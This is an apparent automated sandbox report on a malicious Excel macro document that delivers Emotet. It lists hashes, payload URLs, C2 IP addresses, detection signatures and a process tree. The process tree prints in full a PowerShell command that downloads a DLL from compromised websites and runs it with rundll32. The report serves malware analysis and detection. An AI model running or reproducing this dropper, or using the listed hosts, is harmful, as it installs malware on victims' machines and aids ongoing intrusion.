Resubmissions
24-11-2021 17:59
211124-wk8rgsddbm 1022-11-2021 14:46
211122-r5n6csagd6 1022-11-2021 14:46
211122-r5csbsfgdp 1022-11-2021 14:44
211122-r4kfsafgdn 1022-11-2021 14:41
211122-r2x9vsfgcq 1022-11-2021 14:20
211122-rneklaffgr 1022-11-2021 14:15
211122-rkk8zaffgl 1017-11-2021 06:51
211117-hm1l1aeefm 1017-11-2021 06:37
211117-hdnk3seedn 10Analysis
-
max time kernel
148s -
max time network
151s -
platform
windows10_x64 -
resource
win10-en-20211104 -
submitted
17-11-2021 06:37
Static task
static1
Behavioral task
behavioral1
Sample
865663204559_17_Nov_2021.xlsm
Resource
win7-en-20211014
General
-
Target
865663204559_17_Nov_2021.xlsm
-
Size
44KB
-
MD5
477fd718bb764ffe3c5afde16c6c8dd2
-
SHA1
eb932e19d95f88d64270d40cdc0b92c6d1cf63be
-
SHA256
ee880ebdf26a1bcebe70a7ba17659199833c6107d758e26d37502bed9a225ee3
-
SHA512
f7d0451ca3670179cc93a680b99f8982204c43054c55eb479c38dc8ea0ba6ba5b6ebea4508569091c07d95a759841455605e6daeab445146b29fc1af377ba267
Malware Config
Extracted
https://evgeniys.ru/sap-logs/D6/
http://crownadvertising.ca/wp-includes/OxiAACCoic/
https://cars-taxonomy.mywebartist.eu/-/BPCahsAFjwF/
http://immoinvest.com.br/blog_old/wp-admin/luoT/
https://yoho.love/wp-content/e4laFBDXIvYT6O/
https://www.168801.xyz/wp-content/6J3CV4meLxvZP/
https://www.pasionportufuturo.pe/wp-content/XUBS/
Extracted
emotet
Epoch4
91.200.186.228:443
191.252.196.221:8080
94.177.248.64:443
66.42.55.5:7080
103.8.26.103:8080
185.184.25.237:8080
103.8.26.102:8080
178.79.147.66:8080
58.227.42.236:80
45.118.135.203:7080
103.75.201.2:443
195.154.133.20:443
45.142.114.231:8080
212.237.5.209:443
207.38.84.195:8080
104.251.214.46:8080
212.237.17.99:8080
212.237.56.116:7080
216.158.226.206:443
110.232.117.186:8080
158.69.222.101:443
107.182.225.142:8080
176.104.106.96:8080
81.0.236.90:443
50.116.54.215:443
138.185.72.26:8080
51.68.175.8:8080
210.57.217.132:8080
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process 3704 2732 cmd.exe 67 -
suricata: ET MALWARE ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex/Trickbot CnC)
suricata: ET MALWARE ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex/Trickbot CnC)
-
suricata: ET MALWARE W32/Emotet CnC Beacon 3
suricata: ET MALWARE W32/Emotet CnC Beacon 3
-
Blocklisted process makes network request 64 IoCs
flow pid Process 27 1288 powershell.exe 35 1288 powershell.exe 40 1156 rundll32.exe 42 1156 rundll32.exe 43 1156 rundll32.exe 44 1156 rundll32.exe 45 1156 rundll32.exe 46 1156 rundll32.exe 47 1156 rundll32.exe 48 1156 rundll32.exe 49 1156 rundll32.exe 50 1156 rundll32.exe 51 1156 rundll32.exe 52 1156 rundll32.exe 53 1156 rundll32.exe 54 1156 rundll32.exe 55 1156 rundll32.exe 56 1156 rundll32.exe 57 1156 rundll32.exe 58 1156 rundll32.exe 59 1156 rundll32.exe 60 1156 rundll32.exe 61 1156 rundll32.exe 62 1156 rundll32.exe 63 1156 rundll32.exe 64 1156 rundll32.exe 65 1156 rundll32.exe 66 1156 rundll32.exe 67 1156 rundll32.exe 68 1156 rundll32.exe 69 1156 rundll32.exe 70 1156 rundll32.exe 71 1156 rundll32.exe 72 1156 rundll32.exe 73 1156 rundll32.exe 74 1156 rundll32.exe 75 1156 rundll32.exe 76 1156 rundll32.exe 77 1156 rundll32.exe 78 1156 rundll32.exe 79 1156 rundll32.exe 80 1156 rundll32.exe 81 1156 rundll32.exe 82 1156 rundll32.exe 84 1156 rundll32.exe 85 1156 rundll32.exe 86 1156 rundll32.exe 87 1156 rundll32.exe 88 1156 rundll32.exe 89 1156 rundll32.exe 90 1156 rundll32.exe 91 1156 rundll32.exe 92 1156 rundll32.exe 93 1156 rundll32.exe 94 1156 rundll32.exe 95 1156 rundll32.exe 96 1156 rundll32.exe 97 1156 rundll32.exe 98 1156 rundll32.exe 99 1156 rundll32.exe 100 1156 rundll32.exe 101 1156 rundll32.exe 102 1156 rundll32.exe 103 1156 rundll32.exe -
Downloads MZ/PE file
-
Loads dropped DLL 2 IoCs
pid Process 4108 rundll32.exe 1420 rundll32.exe -
Drops file in System32 directory 1 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\Lumwntkq\tbbrglptq.gyc rundll32.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString EXCEL.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU EXCEL.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS EXCEL.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 2732 EXCEL.EXE -
Suspicious behavior: EnumeratesProcesses 5 IoCs
pid Process 1288 powershell.exe 1288 powershell.exe 1288 powershell.exe 1156 rundll32.exe 1156 rundll32.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 1288 powershell.exe -
Suspicious use of SetWindowsHookEx 12 IoCs
pid Process 2732 EXCEL.EXE 2732 EXCEL.EXE 2732 EXCEL.EXE 2732 EXCEL.EXE 2732 EXCEL.EXE 2732 EXCEL.EXE 2732 EXCEL.EXE 2732 EXCEL.EXE 2732 EXCEL.EXE 2732 EXCEL.EXE 2732 EXCEL.EXE 2732 EXCEL.EXE -
Suspicious use of WriteProcessMemory 16 IoCs
description pid Process procid_target PID 2732 wrote to memory of 3704 2732 EXCEL.EXE 70 PID 2732 wrote to memory of 3704 2732 EXCEL.EXE 70 PID 3704 wrote to memory of 1288 3704 cmd.exe 72 PID 3704 wrote to memory of 1288 3704 cmd.exe 72 PID 1288 wrote to memory of 4108 1288 powershell.exe 74 PID 1288 wrote to memory of 4108 1288 powershell.exe 74 PID 1288 wrote to memory of 4108 1288 powershell.exe 74 PID 4108 wrote to memory of 1420 4108 rundll32.exe 75 PID 4108 wrote to memory of 1420 4108 rundll32.exe 75 PID 4108 wrote to memory of 1420 4108 rundll32.exe 75 PID 1420 wrote to memory of 1068 1420 rundll32.exe 76 PID 1420 wrote to memory of 1068 1420 rundll32.exe 76 PID 1420 wrote to memory of 1068 1420 rundll32.exe 76 PID 1068 wrote to memory of 1156 1068 rundll32.exe 77 PID 1068 wrote to memory of 1156 1068 rundll32.exe 77 PID 1068 wrote to memory of 1156 1068 rundll32.exe 77
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\865663204559_17_Nov_2021.xlsm"1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2732 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c start /B powershell $dfkj="$strs=\"https://evgeniys.ru/sap-logs/D6/,http://crownadvertising.ca/wp-includes/OxiAACCoic/,https://cars-taxonomy.mywebartist.eu/-/BPCahsAFjwF/,http://immoinvest.com.br/blog_old/wp-admin/luoT/,https://yoho.love/wp-content/e4laFBDXIvYT6O/,https://www.168801.xyz/wp-content/6J3CV4meLxvZP/,https://www.pasionportufuturo.pe/wp-content/XUBS/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"C:\ProgramData\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"C:\Windows\SysWow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:3704 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell $dfkj="$strs=\"https://evgeniys.ru/sap-logs/D6/,http://crownadvertising.ca/wp-includes/OxiAACCoic/,https://cars-taxonomy.mywebartist.eu/-/BPCahsAFjwF/,http://immoinvest.com.br/blog_old/wp-admin/luoT/,https://yoho.love/wp-content/e4laFBDXIvYT6O/,https://www.168801.xyz/wp-content/6J3CV4meLxvZP/,https://www.pasionportufuturo.pe/wp-content/XUBS/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"C:\ProgramData\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"C:\Windows\SysWow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1288 -
C:\Windows\SysWow64\rundll32.exe"C:\Windows\SysWow64\rundll32.exe" C:\ProgramData\431987527.dll,f17435831544⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:4108 -
C:\Windows\SysWOW64\rundll32.exeC:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\431987527.dll",Control_RunDLL5⤵
- Loads dropped DLL
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
PID:1420 -
C:\Windows\SysWOW64\rundll32.exeC:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Lumwntkq\tbbrglptq.gyc",mhqNyttUUqBAi6⤵
- Suspicious use of WriteProcessMemory
PID:1068 -
C:\Windows\SysWOW64\rundll32.exeC:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Lumwntkq\tbbrglptq.gyc",Control_RunDLL7⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
PID:1156
-
-
-
-
-
-